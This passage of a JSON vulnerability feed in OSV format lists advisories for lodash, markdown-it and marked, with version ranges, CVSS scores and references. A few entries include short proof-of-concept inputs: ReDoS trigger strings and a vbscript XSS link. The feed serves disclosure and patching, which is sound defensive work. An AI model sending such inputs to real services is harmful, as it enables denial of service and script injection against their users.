{ "introduced": "3.7.0" }, { "fixed": "4.17.19" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.7.0" }, { "fixed": "4.17.20" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.pick", "ecosystem": "npm", "purl": "pkg:npm/lodash.pick" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.0.0" }, { "last_affected": "4.4.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.set", "ecosystem": "npm", "purl": "pkg:npm/lodash.set" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "3.7.0" }, { "last_affected": "4.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.setwith", "ecosystem": "npm", "purl": "pkg:npm/lodash.setwith" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.update", "ecosystem": "npm", "purl": "pkg:npm/lodash.update" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.10.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash.updatewith", "ecosystem": "npm", "purl": "pkg:npm/lodash.updatewith" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "last_affected": "4.10.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.7.0" }, { "fixed": "4.17.19" } ] } ], "versions": [ "3.10.0", "3.10.1", "3.7.0", "3.9.3", "4.0.0", "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.11", "4.17.14", "4.17.15", "4.17.2", "4.17.4", "4.17.5", "4.3.0", "4.5.1", "4.6.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/07/GHSA-p6mc-m468-83gw/GHSA-p6mc-m468-83gw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8203" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/issues/4744" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/issues/4874" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/2884" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/c84fe82760fb2d3e03a63379b297a1cc1a2fce12" }, { "type": "WEB", "url": "https://hackerone.com/reports/712065" }, { "type": "WEB", "url": "https://hackerone.com/reports/864701" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/wiki/Changelog#v41719" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2020-8203.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200724-0006" }, { "type": "WEB", "url": "https://web.archive.org/web/20210914001339/https://github.com/lodash/lodash/issues/4744" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2020-07-15T19:14:58Z", "nvd_published_at": "2020-07-15T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-x5rq-j2xg-h7qm", "published": "2019-07-19T16:13:07Z", "modified": "2025-09-29T21:05:48.105698Z", "aliases": [ "CVE-2019-1010266" ], "summary": "Regular Expression Denial of Service (ReDoS) in lodash", "details": "lodash prior to 4.7.11 is affected by: CWE-400: Uncontrolled Resource Consumption. The impact is: Denial of service. The component is: Date handler. The attack vector is: Attacker provides very long strings, which the library attempts to match using a regular expression. The fixed version is: 4.7.11.", "affected": [ { "package": { "name": "lodash", "ecosystem": "npm", "purl": "pkg:npm/lodash" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } }, { "package": { "name": "lodash-es", "ecosystem": "npm", "purl": "pkg:npm/lodash-es" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } }, { "package": { "name": "lodash-amd", "ecosystem": "npm", "purl": "pkg:npm/lodash-amd" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } }, { "package": { "name": "lodash-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/lodash-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.7.0" }, { "fixed": "4.17.11" } ] } ], "versions": [ "4.11.2", "4.12.0", "4.13.1", "4.14.1", "4.15.0", "4.16.1", "4.16.3", "4.16.4", "4.16.6", "4.17.10", "4.17.2", "4.17.4", "4.17.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-x5rq-j2xg-h7qm/GHSA-x5rq-j2xg-h7qm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010266" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/issues/3359" }, { "type": "WEB", "url": "https://github.com/github/advisory-database/pull/6138" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/commit/5c08f18d365b64063bfbfa686cbb97cdd6267347" }, { "type": "PACKAGE", "url": "https://github.com/lodash/lodash" }, { "type": "WEB", "url": "https://github.com/lodash/lodash/wiki/Changelog" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/lodash-rails/CVE-2019-1010266.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190919-0004" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-LODASH-73639" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-07-19T16:11:26Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6vfc-qv3f-vr6c", "published": "2022-01-12T22:20:22Z", "modified": "2023-11-08T04:08:07.059316Z", "aliases": [ "CVE-2022-21670" ], "summary": "Uncontrolled Resource Consumption in markdown-it", "details": "### Impact\n\nSpecial patterns with length \u003e 50K chars can slow down parser significantly.\n\n```js\nconst md = require('markdown-it')();\n\nmd.render(`x ${' '.repeat(150000)} x \\nx`);\n```\n\n\n### Patches\n\nUpgrade to v12.3.2+\n\n### Workarounds\n\nNo.\n\n### References\n\nFix + test sample: https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101\n", "affected": [ { "package": { "name": "markdown-it", "ecosystem": "npm", "purl": "pkg:npm/markdown-it" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "12.3.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-6vfc-qv3f-vr6c/GHSA-6vfc-qv3f-vr6c.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/security/advisories/GHSA-6vfc-qv3f-vr6c" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21670" }, { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/commit/ffc49ab46b5b751cd2be0aabb146f2ef84986101" }, { "type": "PACKAGE", "url": "https://github.com/markdown-it/markdown-it" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-01-10T21:50:05Z", "nvd_published_at": "2022-01-10T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-j5p7-jf4q-742q", "published": "2022-12-27T09:30:41Z", "modified": "2023-11-08T03:57:48.904226Z", "aliases": [ "CVE-2015-10005" ], "summary": "markdown-it vulnerable to Inefficient Regular Expression Complexity", "details": "A vulnerability was found in markdown-it up to 2.x. It has been classified as problematic. Affected is an unknown function of the file `lib/common/html_re.js`. The manipulation leads to inefficient regular expression complexity. Upgrading to version 3.0.0 is able to address this issue. The name of the patch is 89c8620157d6e38f9872811620d25138fc9d1b0d. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216852.", "affected": [ { "package": { "name": "markdown-it", "ecosystem": "npm", "purl": "pkg:npm/markdown-it" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-j5p7-jf4q-742q/GHSA-j5p7-jf4q-742q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10005" }, { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/commit/89c8620157d6e38f9872811620d25138fc9d1b0d" }, { "type": "PACKAGE", "url": "https://github.com/markdown-it/markdown-it" }, { "type": "WEB", "url": "https://github.com/markdown-it/markdown-it/releases/tag/3.0.0" }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.216852" }, { "type": "WEB", "url": "https://vuldb.com/?id.216852" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2022-12-30T16:27:08Z", "nvd_published_at": "2022-12-27T09:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4r62-v4vq-hr96", "published": "2021-02-08T21:17:58Z", "modified": "2023-11-08T04:04:40.912168Z", "aliases": [ "CVE-2021-21306" ], "related": [ "CVE-2021-21306" ], "summary": "Regular Expression Denial of Service (REDoS) in Marked", "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\n[Regular expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n\nA Denial of Service attack can affect anyone who runs user generated code through `marked`.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\npatched in v2.0.0\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nNone.\n\n### References\n_Are there any links users can visit to find out more?_\n\nhttps://github.com/markedjs/marked/issues/1927\nhttps://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [marked](https://github.com/markedjs/marked/issues)", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.1.1" }, { "fixed": "2.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/02/GHSA-4r62-v4vq-hr96/GHSA-4r62-v4vq-hr96.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markedjs/marked/security/advisories/GHSA-4r62-v4vq-hr96" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21306" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/issues/1927" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/pull/1864" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/7293251c438e3ee968970f7609f1a27f9007bccd" }, { "type": "WEB", "url": "https://www.npmjs.com/package/marked" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-02-08T21:17:26Z", "nvd_published_at": "2021-02-08T22:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5v2h-r2cx-5xgj", "published": "2022-01-14T21:04:46Z", "modified": "2023-11-08T04:08:07.532717Z", "aliases": [ "CVE-2022-21681" ], "summary": "Inefficient Regular Expression Complexity in marked", "details": "### Impact\n\n_What kind of vulnerability is it?_\n\nDenial of service.\n\nThe regular expression `inline.reflinkSearch` may cause catastrophic backtracking against some strings.\nPoC is the following.\n\n```javascript\nimport * as marked from 'marked';\n\nconsole.log(marked.parse(`[x]: x\n\n\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](\\\\[\\\\](`));\n```\n\n_Who is impacted?_\n\nAnyone who runs untrusted markdown through marked and does not use a worker with a time limit.\n\n### Patches\n\n_Has the problem been patched?_\n\nYes\n\n_What versions should users upgrade to?_\n\n4.0.10\n\n### Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nDo not run untrusted markdown through marked or run marked on a [worker](https://marked.js.org/using_advanced#workers) thread and set a reasonable time limit to prevent draining resources.\n\n### References\n\n_Are there any links users can visit to find out more?_\n\n- https://marked.js.org/using_advanced#workers\n- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [marked](https://github.com/markedjs/marked)\n", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-5v2h-r2cx-5xgj/GHSA-5v2h-r2cx-5xgj.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markedjs/marked/security/advisories/GHSA-5v2h-r2cx-5xgj" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21681" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/8f806573a3f6c6b7a39b8cdb66ab5ebb8d55a5f5" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/c4a3ccd344b6929afa8a1d50ac54a721e57012c0" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AIXDMC3CSHYW3YWVSQOXAWLUYQHAO5UX" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2022-01-14T19:57:17Z", "nvd_published_at": "2022-01-14T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7px7-7xjx-hxm8", "published": "2018-01-04T21:04:19Z", "modified": "2023-11-08T03:58:46.365782Z", "aliases": [ "CVE-2017-1000427" ], "summary": "Marked vulnerable to XSS from data URIs", "details": "marked version 0.3.6 and earlier is vulnerable to an XSS attack in the data: URI parser.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.7" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-7px7-7xjx-hxm8/GHSA-7px7-7xjx-hxm8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000427" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-7px7-7xjx-hxm8" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BO2RMVVZVV6NFTU46B5RYRK7ZCXYARZS" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M6BJG6RGDH7ZWVVAUFBFI5L32RSMQN2S" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:marked:20170112" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:23:14Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9cw2-jqp5-7x39", "published": "2020-08-31T22:52:52Z", "modified": "2023-11-08T03:57:41.045132Z", "aliases": [ "CVE-2014-3743" ], "summary": "Multiple Content Injection Vulnerabilities in marked", "details": "Versions 0.3.0 and earlier of `marked` are affected by two cross-site scripting vulnerabilities, even when `sanitize: true` is set.\n\nThe attack vectors for this vulnerability are GFM Codeblocks and JavaScript URLs.\n\n\n## Recommendation\n\nUpgrade to version 0.3.1 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.1" } ] } ], "database_specific": { "last_known_affected_version_range": "\u003c= 0.3.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/08/GHSA-9cw2-jqp5-7x39/GHSA-9cw2-jqp5-7x39.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-1850" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/22" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:08:10Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cfjh-p3g4-3q2f", "published": "2017-10-24T18:33:36Z", "modified": "2023-11-08T03:57:49.831117Z", "aliases": [ "CVE-2015-1370" ], "summary": "VBScript Content Injection in marked", "details": "Versions 0.3.2 and earlier of `marked` are affected by a cross-site scripting vulnerability even when `sanitize:true` is set. \n\n## Proof of Concept ( IE10 Compatibility Mode Only )\n\n`[xss link](vbscript:alert(1\u0026#41;)`\n\nwill get a link\n\n`\u003ca href=\"vbscript:alert(1)\"\u003exss link\u003c/a\u003e`\n\n\n## Recommendation\n\nUpdate to version 0.3.3 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.3" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-cfjh-p3g4-3q2f/GHSA-cfjh-p3g4-3q2f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-1370" }, { "type": "WEB", "url": "https://github.com/chjj/marked/issues/492" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/issues/492" }, { "type": "WEB", "url": "https://github.com/evilpacket/marked/commit/3c191144939107c45a7fa11ab6cb88be6694a1ba" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/fc372d1c6293267722e33f2719d57cebd67b3da1" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/24" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/24/versions" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/01/23/2" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:31:22Z", "nvd_published_at": null, "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-ch52-vgq2-943f", "published": "2020-09-03T18:15:53Z", "modified": "2020-08-31T18:46:28Z", "summary": "Regular Expression Denial of Service in marked", "details": "Affected versions of `marked` are vulnerable to Regular Expression Denial of Service (ReDoS). The `_label` subrule may significantly degrade parsing performance of malformed input.\n\n\n## Recommendation\n\nUpgrade to version 0.7.0 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0.4.0" }, { "fixed": "0.7.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-ch52-vgq2-943f/GHSA-ch52-vgq2-943f.json" } } ], "references": [ { "type": "WEB", "url": "https://www.npmjs.com/advisories/1076" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-08-31T18:46:28Z", "nvd_published_at": null, "severity": "LOW" } }, { "schema_version": "1.7.3", "id": "GHSA-hjcp-j389-59ff", "published": "2017-10-24T18:33:36Z", "modified": "2024-02-09T17:50:43Z", "aliases": [ "CVE-2015-8854" ], "summary": "Regular Expression Denial of Service in marked", "details": "Versions 0.3.3 and earlier of `marked` are affected by a regular expression denial of service ( ReDoS ) vulnerability when passed inputs that reach the `em` inline rule.\n\n\n\n## Recommendation\n\nUpdate to version 0.3.4 or later.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.4" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-hjcp-j389-59ff/GHSA-hjcp-j389-59ff.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-8854" }, { "type": "WEB", "url": "https://github.com/chjj/marked/issues/497" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-hjcp-j389-59ff" }, { "type": "PACKAGE", "url": "https://github.com/chjj/marked" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BO2RMVVZVV6NFTU46B5RYRK7ZCXYARZS" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M6BJG6RGDH7ZWVVAUFBFI5L32RSMQN2S" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K05052081?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/23" }, { "type": "WEB", "url": "https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/04/20/11" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:40:28Z", "nvd_published_at": "2017-01-23T21:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-p9wx-2529-fp83", "published": "2025-05-23T15:31:16Z", "modified": "2025-05-27T15:27:40.131270Z", "aliases": [ "CVE-2018-25110" ], "summary": "Marked allows Regular Expression Denial of Service (ReDoS) attacks", "details": "Marked prior to version 0.3.17 is vulnerable to a Regular Expression Denial of Service (ReDoS) attack due to catastrophic backtracking in several regular expressions used for parsing HTML tags and markdown links. An attacker can exploit this vulnerability by providing specially crafted markdown input, such as deeply nested or repetitively structured brackets or tag attributes, which cause the parser to hang and lead to a Denial of Service.", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.3.17" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-p9wx-2529-fp83/GHSA-p9wx-2529-fp83.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-25110" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/issues/1070" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/pull/1083" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/20bfc106013ed45713a21672ad4a34df94dcd485" }, { "type": "WEB", "url": "https://github.com/Checkmarx/Vulnerabilities-Proofs-of-Concept/tree/main/2018/CVE-2018-25110" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" } ], "database_specific": { "cwe_ids": [ "CWE-1333" ], "github_reviewed": true, "github_reviewed_at": "2025-05-27T15:03:47Z", "nvd_published_at": "2025-05-23T15:15:20Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rrrm-qjm4-v8hf", "published": "2022-01-14T21:04:41Z", "modified": "2023-11-08T04:08:07.472715Z", "aliases": [ "CVE-2022-21680" ], "summary": "Inefficient Regular Expression Complexity in marked", "details": "### Impact\n\n_What kind of vulnerability is it?_\n\nDenial of service.\n\nThe regular expression `block.def` may cause catastrophic backtracking against some strings.\nPoC is the following.\n\n```javascript\nimport * as marked from \"marked\";\n\nmarked.parse(`[x]:${' '.repeat(1500)}x ${' '.repeat(1500)} x`);\n```\n\n_Who is impacted?_\n\nAnyone who runs untrusted markdown through marked and does not use a worker with a time limit.\n\n### Patches\n\n_Has the problem been patched?_\n\nYes\n\n_What versions should users upgrade to?_\n\n4.0.10\n\n### Workarounds\n\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nDo not run untrusted markdown through marked or run marked on a [worker](https://marked.js.org/using_advanced#workers) thread and set a reasonable time limit to prevent draining resources.\n\n### References\n\n_Are there any links users can visit to find out more?_\n\n- https://marked.js.org/using_advanced#workers\n- https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n\n* Open an issue in [marked](https://github.com/markedjs/marked)\n", "affected": [ { "package": { "name": "marked", "ecosystem": "npm", "purl": "pkg:npm/marked" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "4.0.10" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-rrrm-qjm4-v8hf/GHSA-rrrm-qjm4-v8hf.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/markedjs/marked/security/advisories/GHSA-rrrm-qjm4-v8hf" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-21680" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/commit/c4a3ccd344b6929afa8a1d50ac54a721e57012c0" }, { "type": "PACKAGE", "url": "https://github.com/markedjs/marked" }, { "type": "WEB", "url": "https://github.com/markedjs/marked/releases/tag/v4.0.10" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AIXDMC3CSHYW3YWVSQOXAWLUYQHAO5UX" } ], "database_specific": { "cwe_ids": [ "CWE-1333", "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2022-01-14T19:56:20Z", "nvd_published_at": "2022-01-14T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": 